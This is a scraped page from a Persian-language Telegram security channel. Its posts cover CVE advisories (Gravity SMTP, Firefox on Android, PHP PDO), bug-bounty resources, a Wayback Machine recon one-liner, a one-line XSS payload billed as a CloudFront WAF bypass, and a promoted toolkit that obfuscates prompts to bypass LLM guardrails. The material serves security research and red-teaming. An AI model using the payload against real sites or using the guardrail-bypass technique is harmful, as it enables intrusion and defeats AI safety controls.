World Of Security
5.19K subscribers
45 photos
10 videos
21 files
620 links
Download Telegram
🚨 آسیب‌پذیری افشای اطلاعات در پلاگین وردپرسی Gravity SMTP
باگی با شناسه CVE-2026-4020 کشف شده که به مهاجمین اجازه می‌ده بدون نیاز به احراز هویت (Unauthenticated) به اطلاعات حساسی مثل API Tokens و Keys دسترسی پیدا کنن. این آسیب‌پذیری به شدت تحت اکسپلویت فعاله؛ اگر از این افزونه استفاده می‌کنید، فوراً اون رو به نسخه 2.1.5 آپدیت کنید.
⚠️ چون ممکنه قبل از آپدیت، اطلاعات شما به سرقت رفته باشه پیشنهاد می‌شه تمامی توکن‌ها و API keyهای مربوط رو باطل و با موارد جدید جایگزین کنید.

https://thehackernews.com/2026/06/hackers-exploit-gravity-smtp-wordpress.html?m=1
3
This media is not supported in your browser
VIEW IN TELEGRAM
کشف زنجیره آسیب‌پذیری جدید: root کردن اندروید ۱۷ از طریق فایرفاکس!
گزارش‌های جدید از کشف یک زنجیره اکسپلویت کامل (Browser-to-Kernel) خبر می‌دهند که تنها با کلیک بر روی یک لینک، دسترسی روت (Root) در اندروید ۱۷ ایجاد می‌کند. این اکسپلویت از یک آسیب‌پذیری روز صفر (0-day) استفاده می‌کند.
🔹 جزئیات کلیدی:
شناسه آسیب‌پذیری: CVE-2026-10702
هدف: مرورگر فایرفاکس در اندروید (نسخه‌های قبل از v151.0.2)
سطح دسترسی: دسترسی کامل از مرورگر تا هسته سیستم‌عامل (Kernel)
🔒 توصیه امنیتی: اگر از مرورگر فایرفاکس روی دستگاه‌های اندرویدی خود استفاده می‌کنید، در اسرع وقت آن را به آخرین نسخه (v151.0.2 یا بالاتر) بروزرسانی کنید و از کلیک بر روی لینک‌های مشکوک خودداری نمایید.
🔥112👍1
XSS: Bypass CloudFront WAF
<object/data="javascript:alert/**/(document.domain)">//</object>
🔥92
Wayback URL Recon - One Liner

curl -s 'https://web .archive.org/cdx/search/cdx?url=testphp.vulnweb.com/*&output=text&fl=original&collapse=urlkey&filter=statuscode:200' | grep -viP '\.(png|jpg|jpeg|gif|svg|ico|pdf|css|mp4|woff2?|ttf|eot)(\?|$)' | sed 's/:80\//\//' | sort -u
🔥61
World Of Security
Wayback URL Recon - One Liner curl -s 'https://web .archive.org/cdx/search/cdx?url=testphp.vulnweb.com/*&output=text&fl=original&collapse=urlkey&filter=statuscode:200' | grep -viP '\.(png|jpg|jpeg|gif|svg|ico|pdf|css|mp4|woff2?|ttf|eot)(\?|$)' | sed 's/:80\//\//'…
البته این یک مثال ساده از بروت لاجیک بود. اما کلا ایده اینه که شما بیایی هرچقدر که میتونی همه چیز رو برای خودتون بهینه کنید.

بعضی وقت ها میبینم که بعضی از دوستان مدت هاست که دارن وقت میزارن رو یک ابزار ریکان خفن بدون دانش صحیح ریکان و متدولوژی مناسب ریکان.
6
World Of Security pinned Deleted message
ابزار تخصصی Bypass Guardrail LLM

یکی از دردسرهای اصلی تست امنیت مدل‌های زبانی، ساخت دستی و تکراری payloadهای obfuscated هست.
این toolkit قدرتمند به صورت اتوماتیک پرامپت‌های ورودی رو با مجموعه گسترده‌ای از تکنیک‌های obfuscation، encoding، transformation و evasion پردازش می‌کنه تا بتونی guardrailهای مختلف (safety filters، alignment mechanisms، output restrictions) رو تست و bypass کنی.

https://x.com/intigriti/status/2072245581309792479?t=80c3yWyYo7494DcuQIPb3Q&s=19

https://elder-plinius.github.io/P4RS3LT0NGV3/
🔥61
🔥31👏1
dom xss cheat sheet

@world_of_security
👍259🔥4🥰1
World Of Security
dom xss cheat sheet @world_of_security
اگر محتوا های این مدلی رو در کنار دیگر لینک های که می‌خونیم دوست دارید
ری اکشن بزارید

موضوع این چیت شیت ها اینه که چیز هایی که می‌خونیم و تحقیق میکنیم رو می‌دیم به ai خلاصشو براتون شیر میکنیم

پس با ری اکشناتون روی پست بالا مارو حمایت کنید
13👍3
🐘 PHP PDO layer exposed! Aleksey Solovev & Nikita Sveshnikov uncovered 2 flaws: SQL Injection in pdo_firebird (CVE-2025-14179) and DoS in PDO via pdo_pgsql (CVE-2025-14180).

https://swarm.ptsecurity.com/hack-the-elephant-one-bite-at-a-time-nul-byte-sql-injection-in-pdo_firebird-and-null-pointer-dereference-in-pdo-pgsql/
4🔥1
این مخزن میاد تمامی برنامه هارو از پلتفرم های باگ بانتی جمع آوری می‌کنه و اونارو در اختیارتون قرار میده
چیز عجیبی نیست و قدیمی هم هست اما خب هنوز هم می‌تونه کار آمد باشه.

https://github.com/arkadiyt/bounty-targets-data
🔥72
😁23